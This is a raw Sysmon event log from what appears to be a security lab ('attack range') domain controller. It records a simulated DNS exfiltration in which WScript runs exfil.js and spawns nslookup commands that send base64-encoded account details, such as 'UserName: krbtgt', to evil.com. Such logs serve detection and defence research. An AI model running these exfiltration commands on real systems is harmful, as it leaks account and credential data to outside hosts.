14:16:08.705{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-063E-000000005F02}7604C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.704{2E1864BB-17A1-629A-783D-000000005F02}55525748C:\Windows\System32\WScript.exe{2E1864BB-17A8-629A-063E-000000005F02}7604C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.704{2E1864BB-17A8-629A-063E-000000005F02}7604C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldfyrz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.685{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nluho.tmpMD5=7D9173BD0DB6CB1EF243CECFF708168B,SHA256=E1F06C46829F00B73E93E5CA6A77E87CA3F897BE9C930070FC4C0794E517005D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.639{2E1864BB-17A8-629A-043E-000000005F02}50487484C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-053E-000000005F02}3792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.623{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.623{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.623{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.623{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.623{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-053E-000000005F02}3792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.623{2E1864BB-17A8-629A-033E-000000005F02}77323004C:\Windows\system32\cmd.exe{2E1864BB-17A8-629A-053E-000000005F02}3792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.636{2E1864BB-17A8-629A-053E-000000005F02}3792C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A8-629A-033E-000000005F02}7732C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluho.tmp 2>&1 354300x8000000000000000194872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.269{00000000-0000-0000-0000-000000000000}2032<unknown process>-udptruefalse127.0.0.1-52131-false127.0.0.1-53domain 23542300x8000000000000000194871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.623{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B590CBE21C301B438EFFB55A9639A231,SHA256=178FA143B5439A3772F624A9FE619FD62A02F4FB1DC3A25BF5C8E92E2D2E2115,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.607{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-043E-000000005F02}5048C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.607{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-043E-000000005F02}5048C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.607{2E1864BB-17A8-629A-043E-000000005F02}50487484C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-033E-000000005F02}7732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.584{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-043E-000000005F02}5048C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.584{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.584{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.584{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.584{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.584{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-033E-000000005F02}7732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.584{2E1864BB-17A1-629A-783D-000000005F02}55524296C:\Windows\System32\WScript.exe{2E1864BB-17A8-629A-033E-000000005F02}7732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.586{2E1864BB-17A8-629A-033E-000000005F02}7732C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluho.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.568{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlojds.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.552{2E1864BB-17A8-629A-013E-000000005F02}47406216C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-023E-000000005F02}6604C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.552{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.552{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.552{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.552{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.552{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-023E-000000005F02}6604C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.552{2E1864BB-17A8-629A-003E-000000005F02}3005440C:\Windows\system32\cmd.exe{2E1864BB-17A8-629A-023E-000000005F02}6604C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.556{2E1864BB-17A8-629A-023E-000000005F02}6604C:\Windows\System32\nslookup.exe10.0.14393.0 